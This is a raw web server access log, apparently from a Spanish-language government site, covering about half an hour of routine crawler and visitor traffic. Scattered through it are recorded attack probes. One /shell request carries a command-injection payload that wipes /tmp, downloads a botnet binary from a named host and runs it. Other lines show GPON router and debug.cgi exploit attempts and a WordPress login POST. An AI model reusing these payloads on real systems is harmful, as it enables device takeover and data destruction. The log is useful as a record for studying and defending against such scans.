66.249.73.127 - - [06/Sep/2022:03:54:11 -0500] "-" 408 -
40.77.167.40 - - [06/Sep/2022:03:55:27 -0500] "GET /portaldeninos/2021/06/10/ganadores-del-concurso-a-vuelo-de-pajaro-recibieron-reconocimientos-de-la-secretaria-de-ambiente/ HTTP/1.1" 200 109578
201.245.192.253 - - [06/Sep/2022:03:56:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:56:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:56:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:57:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
201.245.192.253 - - [06/Sep/2022:04:01:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:04:01:42 -0500] "HEAD / HTTP/1.1" 200 -
120.85.94.150 - - [06/Sep/2022:04:01:38 -0500] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 1013
66.249.73.127 - - [06/Sep/2022:04:03:09 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:04:02:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:04:02:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [06/Sep/2022:04:06:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:04:06:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:04:09:33 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:04:07:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
41.239.48.240 - - [06/Sep/2022:04:09:37 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+botnet.psscc.cn/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [06/Sep/2022:04:08:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [06/Sep/2022:04:11:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
189.108.178.6 - - [06/Sep/2022:04:11:31 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
189.108.178.6 - - [06/Sep/2022:04:11:35 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
216.245.221.92 - - [06/Sep/2022:04:11:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:04:11:53 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
185.119.81.105 - - [06/Sep/2022:04:11:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:04:11:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
173.252.87.12 - - [06/Sep/2022:04:12:15 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
64.225.5.197 - - [06/Sep/2022:04:12:37 -0500] "GET / HTTP/1.1" 200 319
185.220.101.168 - - [06/Sep/2022:04:12:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [06/Sep/2022:04:13:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:04:16:05 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:04:14:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [06/Sep/2022:04:16:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:04:16:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:04:19:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41656
201.245.192.253 - - [06/Sep/2022:04:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42460
172.22.2.4 - - [06/Sep/2022:04:18:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
185.216.71.242 - - [06/Sep/2022:04:21:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Sep/2022:04:19:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:04:21:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.216.71.242 - - [06/Sep/2022:04:21:18 -0500] "POST /debug.cgi HTTP/1.1" 404 1018
216.245.221.92 - - [06/Sep/2022:04:21:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:04:20:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
66.249.73.127 - - [06/Sep/2022:04:22:49 -0500] "-" 408 -
207.46.13.186 - - [06/Sep/2022:04:22:56 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12496
207.46.13.36 - - [06/Sep/2022:04:23:09 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
207.46.13.16 - - [06/Sep/2022:04:23:15 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
